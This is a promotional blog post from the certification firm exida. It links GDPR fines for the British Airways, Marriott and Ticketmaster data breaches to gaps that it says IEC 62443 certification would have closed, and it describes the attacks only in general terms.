This is the next in a series of blogs and papers on the benefits of cyber certification. You can read part 1 here and part 2 here.  Certification provides you with the opportunity to work with an experienced cyber team here at exida, and the vast knowledge of cyber experts worldwide codified in the IEC 62443 family of standards.

The European Union has the General Data Protection Regulation (GDPR) which fines companies if they do not properly manage user data.  Such a regulation does not exist in the United States although some groups are trying to make that happen.  It is easy to see why large corporations do not want this, more systems to spend money on, so there continues to be an uphill battle.

According to the GDPR there were fines during the last quarter of 2020 equaling almost €110 million euros ($130 million dollars) assessed on organizations that experienced data breaches that compromised personal data.  Several prominent examples follow.

British Airways

How often have you purchased a plane ticket online?  Well, if you bought one from BA in the fall of 2019 there is a good chance that your name, address, and credit card information was skimmed from the BA site during the purchase.  BA did not detect a widget that was placed on their website that recorded keystrokes and sent them to an unknown IP address.  This went on for 2 weeks before discovery.  Per the GDPR, this was negligent, and they were fined around £20M.  The concept of cross site scripting is a well-known attack and is specifically covered in IEC62443-4-2 in the section on Input Validation (“…examples where invalid inputs lead to system security issues include SQL injection attacks, cross-site scripting or malformed packets…”).  If BA had gone through a certification of their website, this would have been discussed, and mitigations would have been put in place.  GDPR determined that this was a well understood attack and BA could have done a better job at securing their user data.

Marriott International

The discovery of a breach in 2018, that had been in place for nearly 4 years, cost Marriott £18.4M.  The original fine was £99.2M but was reduced in late 2020 based on the economic impact of COVID-19.  In this case nearly 340 million customers worldwide had personal data, including passports, compromised.  A Remote Access Trojan (RAT) had existed for some time on their servers.  It appeared to be a user with administrative privileges, but the actual user had not performed to database queries.  They surmise the RAT had been installed as a result of an email phishing campaign.  This kind of social engineering has been quite productive for hackers, and probably the best defense is user education. User competence is a key part of IEC62443-4-1 Practice 8 – Security Guidelines.  This section discusses the overall installation and security maintenance, and a key component of effective security maintenance is user training.  This is sometimes referred to as “security hygiene” and something all organizations need to remind their staff of on a regular basis. The next best defense in this case would have been managing network traffic.  IEC62443-4-2 CR 3.3 – Security Functionality Verification specifically discusses Intrusion Detection systems (IDS) that can monitor and report on unknown network traffic.  Organizations need to know their network traffic profiles.  Letting this attack go on for 4 years was unconscionable.

Ticketmaster

Ticketmaster was fined £1.25M.  In this case an estimated 9.4 million customers had their payment details compromised.  Ticketmaster had incorporated a third party Intebenta Technologies to their payment page which contained the offending code.  Ticketmaster had not done their due diligence on the security practices used by Intebenta, and paid the price.  IEC62443-4-1 has specific guidelines on establishing relationships with vendors and carefully assessing their security capabilities prior to incorporating the third-party product into their system.  In addition, if they also had an Intrusion Detection System installed, the unknown traffic could have been discovered.  This is not an easy task, but well worth the cost of the fine along with company reputation.

Conclusion

One can review the report (see reference below) and conclude that each fine could have been avoided by working with and understanding the IEC62443 standards.  If you believe your product or organization could be vulnerable, look to the combined knowledge of security experts around the world codified in the standards.  At exida, we have been certifying products and systems for 20 years and can help you understand and apply the standard to your organization.

Reference: https://www.itgovernance.co.uk/gdpr-fines-quarterly-report